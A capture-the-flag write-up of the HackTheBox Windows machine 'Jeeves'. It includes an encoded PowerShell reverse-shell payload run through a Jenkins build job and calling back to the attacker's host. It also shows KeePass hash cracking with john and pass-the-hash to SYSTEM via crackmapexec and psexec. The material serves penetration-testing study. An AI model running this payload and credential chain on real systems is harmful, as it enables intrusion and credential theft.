HTB Jeeves done
Jeeves
OS:
Windows
Technology:
ASP.NET
MS SQL Server 2005
Microsoft-IIS/10.0
Jetty: 9.4
Jenkins ver. 2.87
IP Address:
10.10.10.63
Open ports:
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
Users and pass:
After cracking keepass database
L:CEH
P: moonshine1
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.10.63_nmap 10.10.10.63 ; cat 10.10.10.63_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-28 12:59 CET
Nmap scan report for 10.10.10.63
Host is up (0.038s latency).
Not shown: 65531 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Open website: http://10.10.10.63/
We open website and find search field (not working), we see error webpage
http://10.10.10.63/
---
http://10.10.10.63/error.html?
Open website: http://10.10.10.63:50000
Nothing interesing here
http://10.10.10.63:50000
Ffuz: http://10.10.10.63/
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$
ffuf -u http://10.10.10.63/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o 10.10.10.63_ffuz -of all -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.63/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt
:: Output file : 10.10.10.63_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
Index.html [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 42ms]
error.html [Status: 200, Size: 50, Words: 4, Lines: 2, Duration: 95ms]
index.html [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 105ms]
:: Progress: [81876/81876] :: Job [1/1] :: 796 req/sec :: Duration: [0:02:33] :: Errors: 0 ::
Ffuz: http://10.10.10.63:50000
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ ffuf -u http://10.10.10.63:50000/FUZZ -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -ac -o 10.10.10.63_50000_ffuz -of all -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.63:50000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt
:: Output file : 10.10.10.63_50000_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
askjeeves [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 39ms]
:: Progress: [882240/882240] :: Job [1/1] :: 975 req/sec :: Duration: [0:19:57] :: Errors: 0 ::
Open website: http://10.10.10.63:50000/askjeeves/
We found Jenkins ver. 2.87
http://10.10.10.63:50000/askjeeves/
Revshell via execute job
Create a new job
Create a new job
Click "New Item --> "Enter an item name" choose 'revshell' --> "Freestyle project" --> OK
http://10.10.10.63:50000/askjeeves/view/all/newJob
Next step we configure steps for build
"Build" --> "Add build step" and put payload
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgAiACwANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
and click Save
http://10.10.10.63:50000/askjeeves/job/revshell/configure
Build job
Click "Build Now" on the dashboard
http://10.10.10.63:50000/askjeeves/job/revshell/
Run netcat from Kali
Run netcat from Kali
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.63] 49682
PS C:\Users\Administrator\.jenkins\workspace\revshell> whoami /all
USER INFORMATION
----------------
User Name SID
============== ===========================================
jeeves\kohsuke S-1-5-21-2851396806-8246019-2289784878-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Users\Administrator\.jenkins\workspace\revshell>
Read flag: user.txt
PS C:\Users\Administrator\.jenkins\workspace\revshell> cd C:\Users\
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 11:07 PM Administrator
d----- 11/5/2017 9:17 PM DefaultAppPool
d----- 11/3/2017 11:19 PM kohsuke
d-r--- 10/25/2017 4:46 PM Public
PS C:\Users> cd kohsuke
PS C:\Users\kohsuke> cd Desktop
PS C:\Users\kohsuke\Desktop> dir
Directory: C:\Users\kohsuke\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/3/2017 11:22 PM 32 user.txt
PS C:\Users\kohsuke\Desktop> type user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop>
Find keepass database: CEH.kdbx
Find keepass database
PS C:\Users\kohsuke> dir
Directory: C:\Users\kohsuke
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 10:51 PM .groovy
d-r--- 11/3/2017 11:15 PM Contacts
d-r--- 11/3/2017 11:19 PM Desktop
d-r--- 11/3/2017 11:18 PM Documents
d-r--- 11/3/2017 11:15 PM Downloads
d-r--- 11/3/2017 11:15 PM Favorites
d-r--- 11/3/2017 11:22 PM Links
d-r--- 11/3/2017 11:15 PM Music
d-r--- 11/3/2017 11:22 PM OneDrive
d-r--- 11/4/2017 3:10 AM Pictures
d-r--- 11/3/2017 11:15 PM Saved Games
d-r--- 11/3/2017 11:16 PM Searches
d-r--- 11/3/2017 11:15 PM Videos
PS C:\Users\kohsuke> cd Documents
PS C:\Users\kohsuke\Documents> dir
Directory: C:\Users\kohsuke\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2017 1:43 PM 2846 CEH.kdbx
Download keepass database to Kali
1 Copy database to Jenkins folder
PS C:\Users\kohsuke\Documents> dir C:\Users\Administrator\.jenkins\workspace
Directory: C:\Users\Administrator\.jenkins\workspace
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/28/2024 2:31 PM revshell
d----- 3/27/2024 6:34 PM testJankins1
PS C:\Users\kohsuke\Documents> copy CEH.kdbx C:\Users\Administrator\.jenkins\workspace\revshell\
PS C:\Users\kohsuke\Documents>
---
2 Download file via Jenkins
Web:
http://10.10.10.63:50000/askjeeves/job/revshell/ws/
Command line:
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ wget http://10.10.10.63:50000/askjeeves/job/revshell/ws/CEH.kdbx
--2024-03-28 15:14:53-- http://10.10.10.63:50000/askjeeves/job/revshell/ws/CEH.kdbx
Connecting to 10.10.10.63:50000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2846 (2.8K) [application/octet-stream]
Saving to: ‘CEH.kdbx’
CEH.kdbx 100%[==============================================>] 2.78K --.-KB/s in 0s
2024-03-28 15:14:53 (77.4 MB/s) - ‘CEH.kdbx’ saved [2846/2846]
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX
Cracking keepass database - keepass2john
1 Create hash - keepass2john
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ keepass2john CEH.kdbx | tee CEH.kdbx.hash
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
---
2 Use john to cracking
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ john CEH.kdbx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:01:36 DONE (2024-03-28 15:22) 0.01033g/s 568.1p/s 568.1c/s 568.1C/s nando1..molly21
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Read all record from database
1 Open database from Keepassxc and export all record to *.xml
Menu
"Database" --> Export --> "XML File"
---
2 Dump all password from commandline
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ cat CEH_export.xml | grep -i "ProtectInMemory" | grep -Po "(?=\"\>).*(?=</)" | tr -d '>"' | sort | uniq > passwords.txt
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ cat passwords.txt
12345
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
F7WhTrSFDKB6sxHU1cUn
lCEUnYPjNfIuPZSzOySA
Password
pwndyouall!
S1TjAtJHKsugh9oC4VZl
Crackmapexec
Crackmapexec with password from file
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ crackmapexec smb 10.10.10.63 -u Administrator -p passwords.txt
SMB 10.10.10.63 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:12345 STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:F7WhTrSFDKB6sxHU1cUn STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:lCEUnYPjNfIuPZSzOySA STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:Password STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:pwndyouall! STATUS_LOGON_FAILURE
SMB 10.10.10.63 445 JEEVES [-] Jeeves\Administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE
Crackmapexec use hash NTLM
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ crackmapexec smb 10.10.10.63 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
SMB 10.10.10.63 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.10.10.63 445 JEEVES [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)
Login as Administrator to nt authority\system
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Jeeves]
└─$ python3 /home/kali/.local/bin/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 [email protected] cmd.exe
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.63.....
[*] Found writable share ADMIN$
[*] Uploading file oPEtBjIR.exe
[*] Opening SVCManager on 10.10.10.63.....
[*] Creating service lWGu on 10.10.10.63.....
[*] Starting service lWGu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Read flag: root.txt
Read file: hm.txt
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,634,489,856 bytes free
C:\Users\Administrator\Desktop> type hm.txt
The flag is elsewhere. Look deeper.
Find flag root.txt via alternative data streams
C:\Users\Administrator\Desktop> dir /R
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,634,489,856 bytes free
C:\Users\Administrator\Desktop> more < hm.txt:root.txt
afbc5bd4b615a60648cec41c6ac92530
References
[Windows ::DATA Alternate Data Stream](https://owasp.org/www-community/attacks/Windows_alternate_data_stream)
Lessons Learned